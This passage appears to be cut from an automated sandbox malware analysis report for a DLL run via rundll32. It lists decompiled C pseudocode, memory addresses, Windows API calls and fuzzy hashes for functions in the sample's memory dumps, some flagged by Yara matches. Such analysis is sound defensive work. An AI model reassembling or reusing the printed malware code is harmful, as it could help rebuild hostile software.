												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                          0x036d2737
                                                          0x036d2740
                                                          0x036d2741
                                                          0x036d2745
                                                          0x036d274b
                                                          0x036d2751
                                                          0x036d275a
                                                          0x036d2760
                                                          0x036d276a
                                                          0x036d276c
                                                          0x036d2772
                                                          0x036d2777
                                                          0x036d2782
                                                          0x036d2788
                                                          0x036d278d
                                                          0x036d28af
                                                          0x036d2793
                                                          0x036d2793
                                                          0x036d27a0
                                                          0x036d27a6
                                                          0x036d27ac
                                                          0x036d27b0
                                                          0x036d27b6
                                                          0x036d27c3
                                                          0x036d27c7
                                                          0x036d27cd
                                                          0x036d27d0
                                                          0x036d27d8
                                                          0x036d27d9
                                                          0x036d27dd
                                                          0x036d27e1
                                                          0x036d27e4
                                                          0x036d27e7
                                                          0x036d27ed
                                                          0x036d27f6
                                                          0x036d27fc
                                                          0x036d27fd
                                                          0x036d2800
                                                          0x036d2801
                                                          0x036d2802
                                                          0x036d280a
                                                          0x036d280b
                                                          0x036d280c
                                                          0x036d280e
                                                          0x036d2812
                                                          0x036d2816
                                                          0x00000000
                                                          0x00000000
                                                          0x036d281c
                                                          0x036d2825
                                                          0x036d282b
                                                          0x036d2835
                                                          0x036d2839
                                                          0x036d283b
                                                          0x036d2848
                                                          0x036d284c
                                                          0x036d2854
                                                          0x036d2859
                                                          0x036d286b
                                                          0x036d286d
                                                          0x036d2873
                                                          0x036d2873
                                                          0x036d287c
                                                          0x036d287c
                                                          0x036d287e
                                                          0x036d2884
                                                          0x036d2884
                                                          0x036d2887
                                                          0x036d288d
                                                          0x036d2890
                                                          0x036d2899
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d2899
                                                          0x036d27ed
                                                          0x036d27e7
                                                          0x036d27d0
                                                          0x036d289f
                                                          0x036d289f
                                                          0x036d28a5
                                                          0x036d28a5
                                                          0x036d28ab
                                                          0x036d28ab
                                                          0x036d28b4
                                                          0x036d28ba
                                                          0x036d28ba
                                                          0x036d2777
                                                          0x036d28c3

                                                          APIs
                                                          • SysAllocString.OLEAUT32(036D9290), ref: 036D2782
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 036D2863
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D287C
                                                          • SysFreeString.OLEAUT32(?), ref: 036D28AB
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: 967de5de351f1cc7ae3e58330efc886353fa5fd855e38a54c041f9a6a9c002ef
                                                          • Instruction ID: 1571a88547cb5d3973a9fd08a3402f30b857e489d4be97575e854bed6abae7cb
                                                          • Opcode Fuzzy Hash: 967de5de351f1cc7ae3e58330efc886353fa5fd855e38a54c041f9a6a9c002ef
                                                          • Instruction Fuzzy Hash: FE514B75D00609EFCB00DFA8D898DAEF7BAEF88700B144998E915EB314D7329D45CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D5B9D Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 036D5BD8
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D5CBD
                                                            • Part of subcall function 036D2732: SysAllocString.OLEAUT32(036D9290), ref: 036D2782
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 036D5D10
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D5D1F
                                                            • Part of subcall function 036D3A62: Sleep.KERNEL32(000001F4), ref: 036D3AAA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                          • String ID:
                                                          • API String ID: 3193056040-0
                                                          • Opcode ID: 4d4d0f10f24732c3a861f5778af6591898e351ad4a4f3ed1dc916944044d74d9
                                                          • Instruction ID: 2893bbfc5bc5abffb60e5cb654bea9520e0c8409efdac0ba89f6871922412e4c
                                                          • Opcode Fuzzy Hash: 4d4d0f10f24732c3a861f5778af6591898e351ad4a4f3ed1dc916944044d74d9
                                                          • Instruction Fuzzy Hash: B0515039900609AFDB01DFA8D844A9EB7B6FF89740F15842DEA05DB324DB71ED05CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06292E7D Relevance: 6.1, APIs: 4, Instructions: 140stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,0628DD27,00000000,0000EA60,00000000,00000000,00000000,?,0627DBAC,?,?), ref: 06292E89
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • ResetEvent.KERNEL32(?,?,?,?,0628DD27,00000000,0000EA60,00000000,00000000,00000000,?,0627DBAC,?,?,00000000,06273EC6), ref: 06292F00
                                                          • GetLastError.KERNEL32(?,?,?,0628DD27,00000000,0000EA60,00000000,00000000,00000000,?,0627DBAC,?,?,00000000,06273EC6,?), ref: 06292F2D
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          • GetLastError.KERNEL32(?,?,?,0628DD27,00000000,0000EA60,00000000,00000000,00000000,?,0627DBAC,?,?,00000000,06273EC6,?), ref: 06292FEF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: 3fe59da100de1adf1d1c0449f45f0af74134b220f14406899a1de2917944f9fc
                                                          • Instruction ID: 6ae523fcd26882541205743b8bda489d5321a4edcadaa4609243e312994c4f05
                                                          • Opcode Fuzzy Hash: 3fe59da100de1adf1d1c0449f45f0af74134b220f14406899a1de2917944f9fc
                                                          • Instruction Fuzzy Hash: 31416171A21305FFEB619FA0DC88EAB7BADEF84754B044929FE46D1190E770DA44CA70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D1DE3 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E036D1DE3(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E036D2FAB(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E036D1CC1(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E036D2920(_t101,  &_v428, _a8, _t96 - _t81);
					E036D2920(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E036D1CC1(_t101, 0x36da1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E036D1CC1(_a16, _a4);
						E036D3ADA(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L036D824A();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L036D8244();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E036D241B(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E036D2378(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E036D79CC(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x36da1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                          0x036d1de6
                                                          0x036d1df2
                                                          0x036d1df8
                                                          0x036d1dfd
                                                          0x036d1e01
                                                          0x036d1f73
                                                          0x036d1f77
                                                          0x036d1f77
                                                          0x036d1e07
                                                          0x036d1e0b
                                                          0x036d1e0f
                                                          0x036d1e12
                                                          0x036d1e1d
                                                          0x036d1e23
                                                          0x036d1e28
                                                          0x036d1e2b
                                                          0x036d1e45
                                                          0x036d1e54
                                                          0x036d1e60
                                                          0x036d1e6a
                                                          0x036d1e6f
                                                          0x036d1e71
                                                          0x036d1e74
                                                          0x036d1f2b
                                                          0x036d1f31
                                                          0x036d1f42
                                                          0x036d1f55
                                                          0x036d1f6b
                                                          0x00000000
                                                          0x036d1f70
                                                          0x036d1e7d
                                                          0x036d1e84
                                                          0x036d1e88
                                                          0x036d1e8e
                                                          0x036d1e90
                                                          0x036d1e92
                                                          0x036d1e94
                                                          0x036d1e96
                                                          0x036d1ea0
                                                          0x036d1ea5
                                                          0x036d1ea7
                                                          0x036d1ea9
                                                          0x036d1eaa
                                                          0x036d1eab
                                                          0x036d1eac
                                                          0x036d1eb3
                                                          0x036d1eba
                                                          0x036d1ebd
                                                          0x036d1ebd
                                                          0x036d1e8a
                                                          0x036d1e8a
                                                          0x036d1e8a
                                                          0x036d1ec5
                                                          0x036d1ecd
                                                          0x036d1ed9
                                                          0x036d1ede
                                                          0x036d1ede
                                                          0x036d1ee3
                                                          0x00000000
                                                          0x00000000
                                                          0x036d1ee5
                                                          0x036d1ee8
                                                          0x036d1ef5
                                                          0x00000000
                                                          0x00000000
                                                          0x036d1ef7
                                                          0x036d1ef7
                                                          0x036d1f04
                                                          0x036d1ede
                                                          0x036d1ee3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d1ee3
                                                          0x036d1f0e
                                                          0x036d1f11
                                                          0x036d1f14
                                                          0x036d1f1b
                                                          0x036d1f1b
                                                          0x036d1f28
                                                          0x00000000
                                                          0x036d1f28
                                                          0x036d1e14
                                                          0x036d1e18
                                                          0x036d1e19
                                                          0x036d1e1b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d1e1b
                                                          0x00000000

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 036D1E96
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 036D1EAC
                                                          • memset.NTDLL ref: 036D1F55
                                                          • memset.NTDLL ref: 036D1F6B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: a7aee5a434164558dcd229e91b59b21536839f5945d87de0cb72728aa2986921
                                                          • Instruction ID: 85ab054a8b69c73912dcfa177d918af664a28dcc241db9b790944ed66c8be735
                                                          • Opcode Fuzzy Hash: a7aee5a434164558dcd229e91b59b21536839f5945d87de0cb72728aa2986921
                                                          • Instruction Fuzzy Hash: 0941C271E00219AFDF50DF68DC44BEE77B9EF86310F004569F9199B280DBB0AE548B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06284DA9 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 06284E5C
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 06284E72
                                                          • memset.NTDLL ref: 06284F1B
                                                          • memset.NTDLL ref: 06284F31
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: 0c651e938ab9638abd98d6ec2afef9697dc78a19d1f17f8aa43cfb533b6f0886
                                                          • Instruction ID: bfb983762efb1251e9b3029ff6d3c0130d6fba2d7f23f8bf444407b39b9302b7
                                                          • Opcode Fuzzy Hash: 0c651e938ab9638abd98d6ec2afef9697dc78a19d1f17f8aa43cfb533b6f0886
                                                          • Instruction Fuzzy Hash: 8E418F32A2121AAFDF90FF68CC80BEE77A5EF45310F004569EC29A7280DB709E55CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627F5ED Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,00000000,00000000,06273EC6,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0628C7D5
                                                          • GetLastError.KERNEL32(?,?,?,06273EC6,?,?), ref: 0628C7EE
                                                          • ResetEvent.KERNEL32(?,?,?,?,06273EC6,?,?), ref: 0628C867
                                                          • GetLastError.KERNEL32(?,?,?,06273EC6,?,?), ref: 0628C882
                                                            • Part of subcall function 0628EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0628EC20
                                                            • Part of subcall function 0628EC09: SetEvent.KERNEL32(?,?,?,?,06273EC6,?,?), ref: 0628EC30
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: 4c23352eb038047bd0040e7a7a861f7707af436dabfd3687877db76d5fa37d8a
                                                          • Instruction ID: 26a41bd11ded1cb808da0fd9a8a7bd4e2b416e315258b9d12cfeb4be2a677c82
                                                          • Opcode Fuzzy Hash: 4c23352eb038047bd0040e7a7a861f7707af436dabfd3687877db76d5fa37d8a
                                                          • Instruction Fuzzy Hash: 4E411932F61201AFDB92BBA4DC44EAE77B9EF882A0F140525ED12D71D0E770E941DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06289A79 Relevance: 6.1, APIs: 4, Instructions: 119stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • StrRChrA.SHLWAPI(?,00000000,00000023,?), ref: 06289A93
                                                          • StrChrA.SHLWAPI(?,0000005C), ref: 06289ABA
                                                          • lstrcpyn.KERNEL32(00000005,?,00000001,00000001), ref: 06289AE0
                                                          • lstrcpy.KERNEL32(?,?), ref: 06289B84
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpylstrcpyn
                                                          • String ID:
                                                          • API String ID: 4154805583-0
                                                          • Opcode ID: 2e798ee759798dca62c405908fadca9ce26234c3837c55f3738235efc2c5a3ae
                                                          • Instruction ID: 420e22657403b4e12fc4fe814e9ea36fc003b35e8fcd14eb9065df86e2195b98
                                                          • Opcode Fuzzy Hash: 2e798ee759798dca62c405908fadca9ce26234c3837c55f3738235efc2c5a3ae
                                                          • Instruction Fuzzy Hash: 5A415E72D11219BFDB51EBA8DC48DEE7BBDAF49350F0444A6EA01E7180D6349A84CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06289185 Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strupr
                                                          • String ID:
                                                          • API String ID: 3408778250-0
                                                          • Opcode ID: e9eacc197304c8e452cba1bea0bb72b0aa2a0e399630560c1ef84fa0e3f487bb
                                                          • Instruction ID: 5167581206396a01e8ab091e5baad4bdcffd705eb2ce8170d35f2221efecc1b5
                                                          • Opcode Fuzzy Hash: e9eacc197304c8e452cba1bea0bb72b0aa2a0e399630560c1ef84fa0e3f487bb
                                                          • Instruction Fuzzy Hash: A9414131C1120A9EEFA1EF78DC88AFEB7A9EF85250F144819EC25D6164D778D5C4CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06274858 Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06279D46: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000), ref: 06279D54
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 062748C0
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 06274911
                                                            • Part of subcall function 0627F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0627F3DB
                                                            • Part of subcall function 0627F39B: GetLastError.KERNEL32 ref: 0627F3E5
                                                            • Part of subcall function 0627F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0627F40A
                                                            • Part of subcall function 0627F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0627F42D
                                                            • Part of subcall function 0627F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0627F455
                                                            • Part of subcall function 0627F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0627F46A
                                                            • Part of subcall function 0627F39B: SetEndOfFile.KERNEL32(00001000), ref: 0627F477
                                                            • Part of subcall function 0627F39B: CloseHandle.KERNEL32(00001000), ref: 0627F48F
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 06274946
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 06274956
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                                                          • String ID:
                                                          • API String ID: 4200334623-0
                                                          • Opcode ID: 7d8898ed784ea855072647b942b4dae3106cb4fdc33f80112379cc2d5ab8e0a1
                                                          • Instruction ID: e32138a005a5c7696f584f88b1bdbee4de0e6fd3051f98d4cccf3f494631971a
                                                          • Opcode Fuzzy Hash: 7d8898ed784ea855072647b942b4dae3106cb4fdc33f80112379cc2d5ab8e0a1
                                                          • Instruction Fuzzy Hash: 64315876A10219FFDB009FA4ED89CAEBBBEEF49250B104065FA05E3110D771AE54DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628EC09 Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0628EC20
                                                          • SetEvent.KERNEL32(?,?,?,?,06273EC6,?,?), ref: 0628EC30
                                                          • GetLastError.KERNEL32 ref: 0628ECB9
                                                            • Part of subcall function 0628F197: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,06292F4B,0000EA60,?,?,?,0628DD27,00000000,0000EA60,00000000), ref: 0628F1B2
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          • GetLastError.KERNEL32(00000000), ref: 0628ECEE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: e8d1ba8e3c91555dd87fb5c0d3dd1787cc28750c50bca66969c0eb141c45f387
                                                          • Instruction ID: fe2eba52eb30171c2d3e89ea863808074dc69391e248a7791d6d2ddb480fa873
                                                          • Opcode Fuzzy Hash: e8d1ba8e3c91555dd87fb5c0d3dd1787cc28750c50bca66969c0eb141c45f387
                                                          • Instruction Fuzzy Hash: B9314575D10309FFDB61EFA1CC8499EBBB8EF48304F114969E942A2191D7719A48CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06284B99 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • TlsGetValue.KERNEL32(?), ref: 06284BC8
                                                          • SetEvent.KERNEL32(?), ref: 06284C12
                                                          • TlsSetValue.KERNEL32(00000001), ref: 06284C4C
                                                          • TlsSetValue.KERNEL32(00000000), ref: 06284C68
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Value$Event
                                                          • String ID:
                                                          • API String ID: 3803239005-0
                                                          • Opcode ID: 611eab952e688289b357c1c47bbcaae6de8bd9dfce1188f4e251afa7f02754da
                                                          • Instruction ID: bd8074a9d0d22455b50305b830a68cc946e61a178420720b3143a08114f5d1ca
                                                          • Opcode Fuzzy Hash: 611eab952e688289b357c1c47bbcaae6de8bd9dfce1188f4e251afa7f02754da
                                                          • Instruction Fuzzy Hash: 0E21EF31A21346AFCFA1BF58DD8999A7BEAFB82710B140428F912C61E1C371DC51CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628A868 Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0628A8C1
                                                          • memcpy.NTDLL(00000018,?,?), ref: 0628A8EA
                                                          • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000BEC1,00000000,000000FF,00000008), ref: 0628A929
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628A93C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                                                          • String ID:
                                                          • API String ID: 2780211928-0
                                                          • Opcode ID: 594870570db1bf85e1a9d33b69f516516e33e60128fae37ba5615a2cf7f3fa82
                                                          • Instruction ID: a8d292e26269c74fe0ff3c106bbcb4b27b2b647226acdea54b9db6e5ffb21305
                                                          • Opcode Fuzzy Hash: 594870570db1bf85e1a9d33b69f516516e33e60128fae37ba5615a2cf7f3fa82
                                                          • Instruction Fuzzy Hash: 8531A270601306AFDB619F28EC49E9A7BA9FF49320F00811AFE59D7290DB71D955CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628F09D Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0628550A: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,00000000,?,?,?,06273EC6), ref: 06285540
                                                            • Part of subcall function 0628550A: memset.NTDLL ref: 062855B6
                                                            • Part of subcall function 0628550A: memset.NTDLL ref: 062855CA
                                                          • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 0628F0F5
                                                          • lstrcmpi.KERNEL32(00000000,?), ref: 0628F11C
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0628F161
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0628F172
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                                                          • String ID:
                                                          • API String ID: 1065503980-0
                                                          • Opcode ID: a41feb45fc2beb8925cddfee8a7114a0c478ba51c4100f3fea3244b958ca021f
                                                          • Instruction ID: c9b8e455a3b52f6951f98e7977928a1c9a7b39e17ac86043635a359e5eaedbab
                                                          • Opcode Fuzzy Hash: a41feb45fc2beb8925cddfee8a7114a0c478ba51c4100f3fea3244b958ca021f
                                                          • Instruction Fuzzy Hash: 74214B71A20309BFDF91AF64ED48EAE7BBAEF44394F104024EE15E6150D7349A58DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628E0C4 Relevance: 6.1, APIs: 4, Instructions: 77stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 0628E0F3
